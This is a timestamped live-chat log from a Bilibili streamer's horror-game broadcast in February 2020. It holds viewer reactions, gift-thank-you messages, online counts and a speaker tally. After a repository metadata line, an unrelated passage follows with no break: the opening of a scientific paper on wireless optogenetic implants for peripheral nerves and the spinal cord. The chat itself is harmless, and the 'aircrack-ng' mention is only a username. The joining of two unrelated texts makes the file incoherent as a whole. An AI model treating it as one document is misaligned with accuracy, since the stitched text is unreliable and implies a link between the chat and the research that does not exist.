1580823310812:387108043:感谢王侯将相立马迎赠送的188个新年红包
1580823312365:387108043:~mua~
1580823349850:212467696:这眼神，哈哈好可爱
1580823362400:153393108:嘿(°∀°)ﾉ
1580823364615:498604787:(｢･ω･)｢可爱
1580823369550:498604787:hi
1580823374031:381768785:(=・ω・=)
1580823379399:393613250:晚上好！
1580823379400:498604787:(º﹃º )
1580823387583:498604787:好
1580823389709:387108043:感谢在河之上赠送的1个新年红包~mua~
1580823400097:387108043:感谢沃德吉尔应帮邦赠送的1个爆竹~mua
1580823401649:387108043:~
1580823403186:387108043:感谢aircrack-ng赠送的1个冰阔
1580823404738:387108043:落~mua~
1580823406824:387108043:感谢帝曦曦曦曦赠送的1个冰阔落~mua~
1580823407985:387108043:感谢帝曦曦曦曦赠送的1个爆竹~mua~
1580823413141:381768785:草
1580823413141:130554:xjhs还行
1580823415199:212467696:突然开车
1580823416364:393613250:这游戏是干嘛的。。
1580823426985:153393108:(｀・ω・´)可以哦
1580823432945:387108043:感谢忆昔知年赠送的3个新年红包~mua~
TIME21:37ONLINE1155
1580823446006:498604787:(｢･ω･)｢嘿
1580823454875:387108043:感谢帝曦曦曦曦赠送的3个新年红包~mua
1580823456417:387108043:~
1580823457978:387108043:感谢帝曦曦曦曦赠送的2个新年红包~mua
TIME21:37ONLINE1155
1580823478174:387108043:感谢王侯将相立马迎赠送的10个爆竹~mu
1580823479715:387108043:a~
1580823488210:387108043:感谢帝曦曦曦曦赠送的10个爆竹~mua~
1580823488210:212467696:鱼叉老师
TIME21:38ONLINE1155
1580823505669:387108043:感谢NEKOPARA赠送的1个新年红包~
1580823506739:387108043:mua~
1580823513761:387108043:感谢帝曦曦曦曦赠送的1个新年红包~mua
1580823516132:387108043:~
1580823517699:387108043:感谢帝曦曦曦曦赠送的2个新年红包~mua
1580823519782:212467696:某个飞机场喷另一个飞机场小
1580823519783:387108043:感谢帝曦曦曦曦赠送的1个新年红包~mua
1580823521973:387108043:~
TIME21:38ONLINE1155
1580823527013:387108043:感谢杖枪由纪赠送的1个新年红包~mua~
1580823529239:387108043:感谢his一瞬间赠送的7个新年红包~mu
1580823530803:387108043:a~
TIME21:39ONLINE1155
1580823578398:17245229:恐怖游戏吗
TIME21:39ONLINE1155
1580823584748:498604787:(｢･ω･)｢嘿
1580823596579:17245229:解谜游戏而已吧？
1580823597959:341925854:下面
1580823600410:393613250:关闭吧。。
1580823600410:3287291:晚好哇owo
1580823600410:381768785:下面
1580823612623:498604787:下面关闭
TIME21:40ONLINE1155
1580823627316:475334543:下面有个关闭键。
1580823639011:340976777:建模告诉我你没看到关闭
1580823640166:381768785:嗯
1580823642325:498604787:(｢･ω･)｢嘿
TIME21:40ONLINE1155
1580823667094:387108043:感谢雪浅梦轩赠送的2个新年红包~mua~
TIME21:41ONLINE1193
1580823676945:153393108:嘿(°∀°)ﾉ
1580823686535:212467696:又是烧脑的解密？
1580823688249:498604787:|･ω･｀)
1580823691383:17245229:什么游戏
1580823698619:498604787:(º﹃º )
TIME21:41ONLINE1193
1580823705917:340976777:三个女的，我酸了
1580823714165:498604787:唔
1580823720202:498604787:(｢･ω･)｢
1580823724563:212467696:嬲
1580823731422:387108043:感谢本滑稽来啦赠送的2个吃瓜~mua~
TIME21:42ONLINE1193
1580823734847:387108043:感谢本滑稽来啦赠送的1个吃瓜~mua~
1580823738131:387108043:感谢帝曦曦曦曦赠送的2个吃瓜~mua~
1580823740537:387108043:感谢帝曦曦曦曦赠送的1个吃瓜~mua~
1580823762286:387108043:感谢本滑稽来啦赠送的3个吃瓜~mua~
TIME21:42ONLINE1193
1580823767802:387108043:感谢取啥名才好丶赠送的2个新年红包~mu
1580823769002:387108043:a~
1580823770897:387108043:感谢取啥名才好丶赠送的1个爆竹~mua~
1580823792644:212467696:贞子？
1580823792644:381768785:(ﾟДﾟ≡ﾟдﾟ)!?
1580823794724:387108043:感谢被遗忘的小潘赠送的1个新年红包~mu
TIME21:43ONLINE1193
1580823796707:387108043:a~
1580823810398:498604787:电视机(｢･ω･)｢
TIME21:43ONLINE1193
1580823836521:212467696:恐怖，莉姬要抱抱（doge）
1580823842213:393613250:可能不是人（滑稽）
TIME21:44ONLINE1193
1580823856260:153393108:别想（拦住）
1580823863633:212467696:scp基金会介入调查
1580823863633:175131157:这是什么游戏来着
1580823865565:393613250:前面的不要想桃子吃(〜￣△￣)〜
1580823872760:153393108:莫名背锅
1580823872760:381768785:(｀・ω・´)
TIME21:44ONLINE1193
1580823912568:212467696:WIFI满格，电量满格
1580823913714:50223195:网红死了我杀的，笑眯眯(°∀°)ﾉ
TIME21:45ONLINE1238
1580823918092:498604787:(｢･ω･)｢哈！
1580823920221:35588256:来晚了
1580823925755:498604787:晚上好
1580823925755:212467696:神盾局？！
1580823936764:35588256::D
TIME21:45ONLINE1238
TIME21:46ONLINE1238
1580823993990:393613250:这个游戏恐怖吗
1580823996114:387108043:感谢飞行bili6675赠送的1个爆竹~
1580823997683:387108043:mua~
TIME21:46ONLINE1238
TIME21:48ONLINE1238
1580824129741:387108043:mua~
1580824133168:387108043:感谢飞行bili6675赠送的1个吃瓜~
1580824135103:387108043:mua~
1580824136658:387108043:感谢飞行bili6675赠送的2个吃瓜~
1580824139327:387108043:感谢飞行bili6675赠送的1个吃瓜~
1580824140887:387108043:mua~
TIME21:49ONLINE1312
TIME21:49ONLINE1312
1580824194772:387108043:感谢楓红红红赠送的1个B坷垃~mua~
TIME21:50ONLINE1312
1580824224866:212467696:监视某人和通讯中断过？
TIME21:50ONLINE1312
TIME21:51ONLINE1312
TIME21:51ONLINE1312
TIME21:52ONLINE1312
1580824366671:387108043:感谢穆棱萼赠送的32个新年红包~mua~
TIME21:52ONLINE1312
1580824373875:387108043:感谢帝曦曦曦曦赠送的1个新年红包~mua
1580824374878:387108043:~
1580824377287:387108043:感谢帝曦曦曦曦赠送的6个新年红包~mua
TIME21:53ONLINE1383
1580824424262:212467696:有个东西在暗中监视她，然后总被她忽略。。
TIME21:53ONLINE1383
TIME21:54ONLINE1383
1580824479973:212467696:第3个吧
TIME21:54ONLINE1383
1580824503818:498604787:(｢･ω･)｢可怕
1580824503818:387108043:感谢被遗忘的小潘赠送的1个新年红包~mu
1580824506342:387108043:a~
TIME21:55ONLINE1383
1580824534624:381768785:(>﹏<)
1580824546324:212467696:感觉这个跟主角聊天的人也有问题
1580824550756:498604787:（揉）
TIME21:55ONLINE1383
TIME21:56ONLINE1383
TIME21:56ONLINE1383
TIME21:57ONLINE1383
TIME21:57ONLINE1383
TIME21:58ONLINE1383
1580824711956:387108043:感谢正在加载中丶丶丶丶丶丶丶赠送的1个红
1580824713492:387108043:灯笼~mua~
TIME21:58ONLINE1383
TIME21:59ONLINE1383
TIME21:59ONLINE1383
TIME22:0ONLINE1383
TIME22:0ONLINE1383
TIME22:1ONLINE1408
TIME22:1ONLINE1408
TIME22:2ONLINE1408
1580824958075:387108043:感谢在河之上赠送的1个新年红包~mua~
TIME22:2ONLINE1408
1580824992493:387108043:感谢帝曦曦曦曦赠送的2个爆竹~mua~
1580824998457:387108043:感谢帝曦曦曦曦赠送的2个爆竹~mua~
TIME22:3ONLINE1408
1580825006782:387108043:感谢帝曦曦曦曦赠送的2个新年红包~mua
1580825008388:387108043:~
1580825010723:387108043:感谢帝曦曦曦曦赠送的1个新年红包~mua
1580825015951:387108043:感谢独立创作赠送的2个新年红包~mua~
TIME22:3ONLINE1408
TIME22:4ONLINE1408
1580825070324:393613250:第二份
1580825079649:387108043:感谢梦子空赠送的1个新年红包~mua~
1580825083011:387108043:感谢独立创作赠送的2个新年红包~mua~
1580825087867:393613250:亲爱的xxxx
TIME22:4ONLINE1441
1580825123653:387108043:感谢独立创作赠送的1个新年红包~mua~
TIME22:5ONLINE1441
TIME22:5ONLINE1441
TIME22:6ONLINE1441
TIME22:6ONLINE1441
TIME22:7ONLINE1441
1580825251589:387108043:感谢在下有点呆赠送的1个新年红包~mua
1580825253229:387108043:~
TIME22:7ONLINE1441
TIME22:8ONLINE1441
1580825326478:35142282:没人？
1580825337969:271860833:-~
TIME22:8ONLINE1446
1580825342307:393613250:有
1580825342307:440885607:有人
1580825343502:381768785:(=・ω・=)
1580825348875:387108043:感谢T-10008赠送的1个新年红包~m
1580825350428:387108043:ua~
1580825366310:387108043:感谢放下live赠送的1个新年红包~mu
1580825367850:387108043:a~
1580825367850:498604787:(｢･ω･)｢
TIME22:9ONLINE1446
1580825381776:387108043:感谢微若尘埃赠送的1个新年红包~mua~
TIME22:9ONLINE1446
TIME22:10ONLINE1446
TIME22:10ONLINE1446
1580825488746:393613250:那个信的第二份不是有个亲爱的xxxx吗
TIME22:11ONLINE1446
1580825489794:387108043:感谢帝曦曦曦曦赠送的1个新年红包~mua
1580825491329:387108043:~
1580825492868:387108043:感谢帝曦曦曦曦赠送的2个新年红包~mua
TIME22:11ONLINE1446
TIME22:12ONLINE1446
TIME22:12ONLINE1457
TIME22:13ONLINE1457
1580825613537:3816770:主题曲
TIME22:14ONLINE1457
1580825649733:26951786:(｀・ω・´)
1580825653295:381768785:哇哦
1580825660223:387108043:感谢逍遥个重赠送的15个新年红包~mua
1580825661759:387108043:~
TIME22:14ONLINE1457
1580825676706:387108043:感谢Diamond_C赠送的12个新年红
1580825678273:387108043:包~mua~
1580825682779:387108043:感谢彼方的彩虹-赠送的1个新年红包~mu
1580825684326:387108043:a~
TIME22:15ONLINE1457
TIME22:15ONLINE1457
1580825735090:387108043:感谢被遗忘的小潘赠送的1个新年红包~mu
1580825736631:387108043:a~
TIME22:16ONLINE1457
TIME22:16ONLINE1457
1580825813435:498604787:|･ω･｀)
TIME22:17ONLINE1474
TIME22:17ONLINE1474
TIME22:18ONLINE1474
TIME22:18ONLINE1474
1580825917511:387108043:感谢大竹荪赠送的1个新年红包~mua~
1580825919252:387108043:感谢大竹荪赠送的2个新年红包~mua~
TIME22:19ONLINE1474
1580825972535:387108043:感谢Dr-Takagi赠送的1个新年红包
1580825974095:387108043:~mua~
TIME22:19ONLINE1474
1580826004832:387108043:感谢被遗忘的小潘赠送的1个新年红包~mu
TIME22:20ONLINE1474
1580826006417:387108043:a~
TIME22:20ONLINE1474
TIME22:21ONLINE1485
TIME22:21ONLINE1485
TIME22:22ONLINE1485
TIME22:22ONLINE1485
1580826194303:498604787:|･ω･｀)
TIME22:23ONLINE1485
TIME22:23ONLINE1485
TIME22:24ONLINE1485
TIME22:24ONLINE1485
TIME22:25ONLINE1485
TIME22:25ONLINE1485
1580826374708:387108043:感谢代号094赠送的2个新年红包~mua
1580826376221:387108043:~
TIME22:26ONLINE1485
TIME22:26ONLINE1485
TIME22:27ONLINE1485
TIME22:27ONLINE1485
1580826474037:387108043:感谢是兔子不是团子赠送的1个新年红包~m
1580826475413:387108043:ua~
1580826476957:387108043:感谢黑秋白赠送的4个新年红包~mua~
1580826490666:387108043:感谢梦游的幻影剑舞赠送的1个新年红包~m
1580826492345:387108043:ua~
TIME22:28ONLINE1485
1580826502953:387108043:感谢海奈敲厉害赠送的1个新年红包~mua
1580826504489:387108043:~
TIME22:28ONLINE1506
TIME22:29ONLINE1506
TIME22:29ONLINE1506
TIME22:30ONLINE1506
TIME22:30ONLINE1506
1580826651816:387108043:感谢璃洛k赠送的4个冰阔落~mua~
1580826671630:387108043:感谢ロリ什么的最喜欢了赠送的6个新年红包
1580826673165:387108043:~mua~
TIME22:31ONLINE1506
1580826683644:387108043:感谢璃洛k赠送的1个么么哒~mua~
TIME22:31ONLINE1506
TIME22:32ONLINE1506
TIME22:32ONLINE1506
TIME22:33ONLINE1506
TIME22:33ONLINE1506
TIME22:34ONLINE1506
1580826877119:247:变态
1580826886736:3816770:就是
TIME22:34ONLINE1506
1580826905798:393613250:这都是什么人啊。。。
TIME22:35ONLINE1506
TIME22:35ONLINE1506
1580826958543:498604787:|･ω･｀)
1580826958543:387108043:感谢BiKo彬赠送的2个新年红包~mua
1580826961067:387108043:~
1580826978671:387108043:感谢崩坏三慕后煮屎者赠送的1个新年红包~
1580826980217:387108043:mua~
TIME22:36ONLINE1506
TIME22:36ONLINE1574
TIME22:37ONLINE1574
TIME22:37ONLINE1574
1580827095432:22164205:感觉像刷微博。。
TIME22:38ONLINE1574
TIME22:38ONLINE1574
TIME22:39ONLINE1574
1580827180879:299892826:这是什么鬼
TIME22:40ONLINE1574
TIME22:40ONLINE1574
TIME22:41ONLINE1574
1580827263161:22164205:好难啊
1580827267920:299892826:？？？
1580827269087:387108043:感谢帝曦曦曦曦赠送的2个新年红包~mua
1580827271574:387108043:~
1580827273115:387108043:感谢帝曦曦曦曦赠送的1个新年红包~mua
TIME22:41ONLINE1574
1580827295380:299892826:解密游戏？
TIME22:42ONLINE1574
1580827324973:22164205:好怪哦
1580827346759:381768785:(>﹏<)
TIME22:42ONLINE1574
1580827352612:299892826:这让我想到那个黑色大丽花被害事件
1580827355064:322159070:来凉凉的直播间冒个泡然后撤回
1580827373492:387108043:感谢吹散孤寂赠送的1个么么哒~mua~
TIME22:43ONLINE1574
1580827400902:322159070:突然想起冠状病毒
TIME22:43ONLINE1574
TIME22:44ONLINE1574
1580827450893:387108043:感谢吹散孤寂赠送的1个打榜~mua~
1580827469527:387108043:感谢夏材枫赠送的8个新年红包~mua~
1580827471849:381768785:草
TIME22:44ONLINE1574
1580827477937:381768785:恐怖游戏
1580827492118:70423490:噗吓我一跳。。
TIME22:45ONLINE1580
1580827505639:393613250:别怕别怕我保护你们（滑稽）
1580827524878:22164205:小心柜子
TIME22:45ONLINE1580
TIME22:46ONLINE1580
TIME22:46ONLINE1580
TIME22:47ONLINE1580
TIME22:47ONLINE1580
TIME22:48ONLINE1580
TIME22:48ONLINE1635
TIME22:49ONLINE1635
TIME22:49ONLINE1635
TIME22:50ONLINE1635
1580827821041:282897495:饿了
1580827830873:387108043:感谢晴夜空雨赠送的4个新年红包~mua~
1580827832833:282897495:从妮妮那里溜回来了
TIME22:50ONLINE1635
1580827860445:282897495:深夜放毒我太难了
TIME22:51ONLINE1635
1580827867515:387108043:感谢晴夜空雨赠送的1个红灯笼~mua~
1580827874321:387108043:感谢旋韵之音赠送的1个红灯笼~mua~
1580827879874:387108043:感谢旋韵之音赠送的2个新年红包~mua~
1580827892554:22164205:哦豁
1580827894930:82853117:可怕
TIME22:51ONLINE1635
1580827898478:12614672:来了老弟
1580827900663:22164205:好怪哦
1580827916399:498604787:(｢･ω･)｢嘿
1580827922470:393613250:关机重启
1580827926515:82853117:兄弟们，把害怕打在公屏上！
TIME22:52ONLINE1635
1580827932849:133507709:坏了就砸了吧
1580827934984:387108043:感谢楓的日記赠送的1个爆竹~mua~
1580827938594:387108043:感谢楓的日記赠送的2个爆竹~mua~
1580827954505:387108043:感谢有栖マナが大好きです赠送的3个新年红
1580827956049:387108043:包~mua~
TIME22:52ONLINE1638
1580827976596:393613250:吓我一跳。。。
TIME22:53ONLINE1638
TIME22:53ONLINE1638
1580828025269:498604787:呐
1580828034073:498604787:(｢･ω･)｢晚安
1580828037740:387108043:感谢帝曦曦曦曦赠送的2个爆竹~mua~
1580828041074:387108043:感谢帝曦曦曦曦赠送的1个爆竹~mua~
1580828042103:387108043:感谢帝曦曦曦曦赠送的3个爆竹~mua~
1580828043516:387108043:感谢帝曦曦曦曦赠送的2个爆竹~mua~
1580828045749:393613250:晚安
TIME22:54ONLINE1638
1580828050385:387108043:感谢帝曦曦曦曦赠送的4个爆竹~mua~
1580828051780:387108043:感谢帝曦曦曦曦赠送的3个爆竹~mua~
1580828054635:387108043:感谢帝曦曦曦曦赠送的1个爆竹~mua~
1580828057040:387108043:感谢帝曦曦曦曦赠送的4个新年红包~mua
1580828059129:387108043:~
1580828060720:387108043:感谢帝曦曦曦曦赠送的1个新年红包~mua
TIME22:54ONLINE1638
TIME22:55ONLINE1638
1580828125856:387108043:感谢被遗忘的小潘赠送的1个新年红包~mu
1580828127414:387108043:a~
TIME22:55ONLINE1638
1580828156505:387108043:感谢可爱的小白兔黑又黑赠送的2个新年红包
1580828158083:387108043:~mua~
1580828163296:3928923:莉姬！！！…最近好勤劳啊
TIME22:56ONLINE1638
TIME22:56ONLINE1638
1580828205423:49657200:有吃的吗
1580828205423:387108043:感谢尴尬yousa赠送的1个新年红包~m
1580828206979:387108043:ua~
1580828219456:393613250:不是让你问话吗。。。。
TIME22:57ONLINE1638
1580828243496:387108043:感谢恶だ物赠送的1个新年红包~mua~
TIME22:57ONLINE1638
TIME22:58ONLINE1638
TIME22:58ONLINE1638
TIME22:59ONLINE1638
1580828371175:272821066:ᶘ ͡°ᴥ͡°ᶅ
TIME22:59ONLINE1638
1580828397749:387108043:感谢额额-无语赠送的6个新年红包~mua
1580828399303:387108043:~
TIME23:0ONLINE1638
1580828424742:387108043:感谢精神病阿赠送的1个新年红包~mua~
TIME23:0ONLINE1690
TIME23:1ONLINE1690
TIME23:1ONLINE1690
TIME23:2ONLINE1690
TIME23:2ONLINE1690
1580828590492:345882685:唔
TIME23:3ONLINE1690
1580828622813:272821066:_(:τ」∠)_
TIME23:3ONLINE1690
1580828640907:345882685:刚进来b站就看见标题网红死了...
TIME23:4ONLINE1690
1580828659679:345882685:我心头一凉
1580828667083:393613250:你猜猜是谁干的(￣3￣)
1580828670198:345882685:感觉进来看看
TIME23:4ONLINE1698
1580828708503:22164205:可能犯人不止一个
TIME23:5ONLINE1698
1580828731000:345882685:不敢直视
TIME23:5ONLINE1698
TIME23:6ONLINE1698
1580828793839:498877957:早点休息吧丽姬
TIME23:6ONLINE1698
1580828816525:387108043:感谢安稳你的风赠送的1个新年红包~mua
1580828818565:387108043:~
TIME23:7ONLINE1698
1580828835511:387108043:感谢萝i莉呆萌受赠送的3个新年红包~mu
1580828836762:387108043:a~
1580828844802:387108043:感谢舞法天女安琪拉赠送的1个新年红包~m
1580828846343:387108043:ua~
1580828847899:387108043:感谢舞法天女安琪拉赠送的5个新年红包~m
TIME23:7ONLINE1698
1580828885756:345882685:偶像是对的
1580828892586:225127777:？？？
TIME23:8ONLINE1704
TIME23:8ONLINE1704
1580828938892:225127777:恐吓是女王玩恐怖游戏的尖叫吗？(=・ω・=)
TIME23:9ONLINE1704
1580828957171:393613250:这些人用玛雅的死成功刷了一波热度（滑稽）
TIME23:9ONLINE1704
TIME23:10ONLINE1704
1580829039559:345882685:看看评论
TIME23:10ONLINE1704
TIME23:11ONLINE1704
TIME23:11ONLINE1704
1580829122647:345882685:措不及防233～
TIME23:12ONLINE1701
TIME23:12ONLINE1701
1580829191967:393613250:这颜色。。。
TIME23:13ONLINE1701
1580829206492:22164205:苦瓜汁
TIME23:13ONLINE1701
1580829230573:383056466:迷惑行为大赏
1580829258931:387108043:感谢不见得是爱萝莉酱哦赠送的3个新年红包
TIME23:14ONLINE1701
1580829260675:387108043:~mua~
1580829278670:387108043:感谢萝i莉呆萌受赠送的1个新年红包~mu
1580829279938:387108043:a~
TIME23:14ONLINE1701
TIME23:15ONLINE1701
TIME23:15ONLINE1701
1580829373121:167205840:什么鬼？手机模拟器？
1580829373121:393613250:大部分都是心碎比心多啊。。
TIME23:16ONLINE1701
TIME23:16ONLINE1701
1580829411267:345882685:那就陪我们啊
1580829425937:345882685:反正也睡不着
TIME23:17ONLINE1701
1580829456954:295908530:这游戏有推理部分吗
TIME23:17ONLINE1701
1580829481425:345882685:有的
1580829493350:393613250:看女王的小眼神awsl
TIME23:18ONLINE1701
1580829502900:345882685:现在在找线索
1580829523536:22164205:邪魅一笑
TIME23:18ONLINE1701
1580829545326:180333328:这些评论都好真实啊
1580829558976:295908530:要推理啥啊。。。。。求解
TIME23:19ONLINE1701
TIME23:19ONLINE1701
1580829593232:345882685:唔
1580829609512:345882685:玛雅怎么被杀的
1580829621140:345882685:在找线索
TIME23:20ONLINE1704
1580829628554:167205840:所以这是别人的手机？(｀·ω·´)
1580829628554:295908530:谢谢
TIME23:20ONLINE1704
TIME23:21ONLINE1704
1580829707761:345882685:有没有玛雅评论的朋友圈嘞
TIME23:22ONLINE1704
1580829732363:393613250:是没钱请吧（doge）
TIME23:22ONLINE1704
TIME23:23ONLINE1702
1580829802199:295908530:这翻译好准确啊
1580829803439:87209064:达成成就，在游戏里刷朋友圈
TIME23:23ONLINE1702
TIME23:24ONLINE1702
1580829847706:393613250:就怕她唱着唱着突然欧耶。。。
1580829862275:318916685:。
1580829872341:387108043:感谢夜鹿少爷赠送的5个新年红包~mua~
TIME23:24ONLINE1702
1580829898910:387108043:感谢夜鹿少爷赠送的1个爆竹~mua~
TIME23:25ONLINE1702
TIME23:25ONLINE1702
1580829955972:387108043:感谢485638692赠送的1个新年红包
1580829957046:387108043:~mua~
TIME23:26ONLINE1715
TIME23:26ONLINE1715
TIME23:27ONLINE1715
1580830031677:345882685:跟穆里奥有关
TIME23:27ONLINE1715
TIME23:28ONLINE1715
TIME23:28ONLINE1715
1580830136735:272044675:这游戏中文翻译是什么？请大佬指导
TIME23:29ONLINE1706
1580830169928:393613250:没电了。。晚安各位
TIME23:29ONLINE1706
TIME23:30ONLINE1706
1580830210567:295908530:我吐了
1580830214327:272044675:晚安，忆昔知年
TIME23:30ONLINE1706
1580830252846:345882685:拟像二
1580830254580:32808713:好久没来，变成两只了？
TIME23:31ONLINE1706
1580830284963:345882685:前面求翻译的
1580830293005:345882685:拟像2
1580830298556:345882685:唔
TIME23:31ONLINE1706
1580830306937:272044675:谢谢大佬
TIME23:32ONLINE1681
1580830353882:272044675:莉姬女王，我想请问下你玩的是恐怖游戏吗？
TIME23:32ONLINE1681
TIME23:33ONLINE1681
1580830403406:272044675:各位大佬，您们好
TIME23:33ONLINE1681
1580830422735:3816770:是恐怖游戏
1580830429182:220058689:各位大佬好
TIME23:34ONLINE1681
1580830461556:345882685:跟穆里奥有关系
1580830466532:345882685:找穆里奥
1580830469712:272044675:难怪，那晚安，各位大佬，莉姬女王
TIME23:34ONLINE1681
1580830486083:345882685:他会告诉你玛雅被杀的细节
1580830499090:387108043:感谢充满憨憨属性的鸽子赠送的1个新年红包
1580830500715:387108043:~mua~
1580830509410:22164205:_(:3」∠)_
TIME23:35ONLINE1677
TIME23:35ONLINE1677
1580830567762:220058689:_§:з)))」∠)_
TIME23:36ONLINE1677
1580830593756:1271784:mua~
TIME23:36ONLINE1677
1580830625716:414012946:我杀的
TIME23:37ONLINE1677
1580830644014:345882685:玩过一回的我已经免疫了...
TIME23:37ONLINE1677
1580830683133:345882685:案宗
TIME23:38ONLINE1680
TIME23:38ONLINE1680
TIME23:39ONLINE1680
TIME23:39ONLINE1680
TIME23:40ONLINE1680
1580830818116:176890253:类似的游戏好多。。。
TIME23:40ONLINE1680
TIME23:41ONLINE1660
1580830875665:498877957:不用找了是我杀的
TIME23:41ONLINE1660
1580830925671:176890253:网红爱订阅没毛病
TIME23:42ONLINE1660
TIME23:42ONLINE1660
TIME23:43ONLINE1660
TIME23:43ONLINE1661
TIME23:44ONLINE1661
TIME23:44ONLINE1661
TIME23:45ONLINE1661
1580831138796:387108043:感谢又粗u过赠送的3个新年红包~mua~
TIME23:45ONLINE1661
TIME23:46ONLINE1661
TIME23:46ONLINE1670
TIME23:47ONLINE1670
1580831251556:345882685:生气了(⌒▽⌒)
1580831267773:387108043:感谢BiKo彬赠送的1个新年红包~mua
1580831267774:220058689:(～￣▽￣)→))*￣▽￣*)o
TIME23:47ONLINE1670
1580831269311:387108043:~
1580831277740:167205840:我也是
TIME23:48ONLINE1670
1580831304515:345882685:表示很平静
1580831309750:220058689:耳机党已阵亡
1580831322974:167205840:吓死了！
TIME23:48ONLINE1670
1580831354561:167205840:要知道我是耳机党
TIME23:49ONLINE1670
TIME23:49ONLINE1665
1580831398196:345882685:不敢关灯了
TIME23:50ONLINE1665
TIME23:50ONLINE1665
1580831470754:297702605:是不是来的有点晚
TIME23:51ONLINE1665
1580831482371:297702605:莉姬晚上好
TIME23:51ONLINE1665
1580831510324:47394374:莉姬现在天天休息么？
1580831531690:47394374:莉姬现在天天修仙么？(◦˙▽˙◦)
1580831531691:387108043:感谢円TeRiRi円赠送的2个新年红包~
1580831533567:387108043:mua~
1580831535104:387108043:感谢阿尔托莉雅女王赠送的1个新年红包~m
1580831536648:387108043:ua~
TIME23:52ONLINE1665
TIME23:52ONLINE1682
1580831595992:387108043:感谢阿尔托莉雅女王赠送的10个爆竹~mu
1580831597525:387108043:a~
TIME23:53ONLINE1682
1580831601730:387108043:感谢阿尔托莉雅女王赠送的10个爆竹~mu
1580831603266:387108043:a~
TIME23:53ONLINE1682
TIME23:54ONLINE1682
TIME23:54ONLINE1682
TIME23:55ONLINE1682
TIME23:55ONLINE1722
TIME23:56ONLINE1722
1580831811120:293767460:刚刚下班的医生，在酒店看看直播，准备休息
TIME23:56ONLINE1722
TIME23:57ONLINE1722
TIME23:57ONLINE1722
TIME23:58ONLINE1722
TIME23:58ONLINE1710
TIME23:59ONLINE1710
TIME23:59ONLINE1710
SPEAKERNUM53;247:水打酥:4,130554:祁轩:2,1271784:尼娅海尤达伽:1,3287291:Riztech:1,3816770:莉姬莉姬莉:3,3928923:TF141幽灵:1,12614672:有栖マナが大好きです:1,17245229:啊布的商用表情:3,22164205:altcure:10,26951786:夏雨沁人心:1,32808713:无金之人:1,35142282:放下live:1,35588256:一乌列一:2,38929857:未闻智乃:2,47394374:愁音冬洁:2,49657200:圣光忽悠着妮:1,50223195:小小橘子酱_:1,65729961:千夏マキ:1,70423490:甘花丶青棠:1,82853117:没考上研不改名T:2,87209064:情殇旧城噬人:1,130084312:欲火神兽:2,133507709:X_Wu:1,153393108:本滑稽来啦:5,167205840:刃穿虛空:5,175131157:愛良soga:1,176890253:被遗忘的小潘:2,180333328:BiKo彬:1,212467696:取啥名才好丶:18,220058689:_天依无缝_:4,225127777:樱月花纱:2,271860833:咖啡伴于:1,272044675:红警龙皇:6,272821066:尴尬yousa:2,282897495:旋韵之音:3,293767460:一生粉奈子:1,295908530:不见得是爱萝莉酱哦:5,297702605:円TeRiRi円:2,299892826:徐子奇kyo:4,318916685:夜鹿少爷:1,322159070:冷宁天:2,340976777:時柒狂叁:2,341925854:球三金:1,345882685:安稳你的风:29,381768785:枫叶晨世:14,383056466:我才不是鸽子-咕咕咕:1,387108043:莉姬女王:198,393613250:忆昔知年:24,414012946:-穿花衣的狐狸-:1,440885607:四糸乃萌酱:1,475334543:飞行bili6675:1,498604787:帝曦曦曦曦:29,498877957:萝i莉呆萌受:2
V2
| the_stack | {'hexsha': 'aa9aff356a3cd46f09cd66ab7c22844042f2f589', 'size': '21140', 'ext': 'txt', 'lang': 'Text', 'max_stars_repo_path': '15142311/2020-2-4.txt', 'max_stars_repo_name': 'dd-center/bilibili-vtuber-danmaku', 'max_stars_repo_head_hexsha': '5fd5c685e420cc0abd00cefff33491d35fec0046', 'max_stars_repo_licenses': "['MIT']", 'max_stars_count': '160', 'max_stars_repo_stars_event_min_datetime': '2019-09-13T12:32:50.000Z', 'max_stars_repo_stars_event_max_datetime': '2022-03-30T07:44:45.000Z', 'max_issues_repo_path': '15142311/2020-2-4.txt', 'max_issues_repo_name': 'dd-center/bilibili-vtuber-danmaku', 'max_issues_repo_head_hexsha': '5fd5c685e420cc0abd00cefff33491d35fec0046', 'max_issues_repo_licenses': "['MIT']", 'max_issues_count': '20', 'max_issues_repo_issues_event_min_datetime': '2020-05-02T15:49:30.000Z', 'max_issues_repo_issues_event_max_datetime': '2022-02-05T01:43:47.000Z', 'max_forks_repo_path': '15142311/2020-2-4.txt', 'max_forks_repo_name': 'dd-center/bilibili-vtuber-danmaku', 'max_forks_repo_head_hexsha': '5fd5c685e420cc0abd00cefff33491d35fec0046', 'max_forks_repo_licenses': "['MIT']", 'max_forks_count': '35', 'max_forks_repo_forks_event_min_datetime': '2019-09-13T12:32:51.000Z', 'max_forks_repo_forks_event_max_datetime': '2022-03-13T01:50:03.000Z', 'avg_line_length': '30.3735632184', 'max_line_length': '965', 'alphanum_fraction': '0.8763481552', 'original_id': 'e5106622b9f9e0118e3d8f7fe9ef14dee41dfac24e26a88b6b8ccb6db39d7143'} |
The use of optogenetics in the brain has revolutionized the interrogation of neural circuitry by enabling temporal and spatial control of neuronal function. However, attempts to apply optogenetic studies to tissues beyond the brain have been stymied by the inability to target peripheral and spinal circuits in freely-moving animals. Studies to date have primarily utilized cumbersome tethered fiber optic cables or light emitting diode (LED) arrays to activate opsins that are expressed transgenically or delivered through gene therapy.^[@R1]--[@R3]^ Although these experimental approaches have utility, physical tethers impede movement, which can alter behavior and the natural motion of animals in complex environments. Additionally, the fixation of fiber-optic cables requires physical bonding to a static skeletal feature such as the skull, and external fixtures can cause device loss due to damage by the animal, a cage mate, or by inadvertent damage from housing or during experiments. These fibers can also damage the surrounding neural tissue during insertion or during fiber coupling due to relative motion of the hard fiber against soft tissues.^[@R4],\ [@R5]^
Thin, injectable polymer filaments with integrated, cellular-scale LEDs and externally mounted wireless power harvesting systems^[@R6]--[@R9]^ represent attractive alternatives, but cannot illuminate spatially challenging and highly mobile areas like peripheral nerves or the spinal cord, which are critical to the study of the extracranial circuits involved in sensory input and motor output. Recently developed fully implantable devices with radio frequency powered LEDs achieve some capabilities in these contexts^[@R10]^, however these devices utilize hard materials and geometrically thick designs which limits their potential for chronic biocompatibility and integration with soft tissues of the nervous system.
Miniaturized, biocompatible devices that can safely interface with peripheral neural tissue and illuminate challenging areas are needed to advance the technology support for advanced optogenetic studies not only of the brain, but also of issues related to chronic pain, itch, and other neurological disorders. The development of suitable devices requires managing heat generation and power delivery, enabling robust remote activation with uniform, natural operation across cage configurations and animal species, achieving power delivery over large areas, and realizing miniaturization with thin geometries and low-modulus, elastic mechanics for chronic tissue compatibility.^[@R8]^
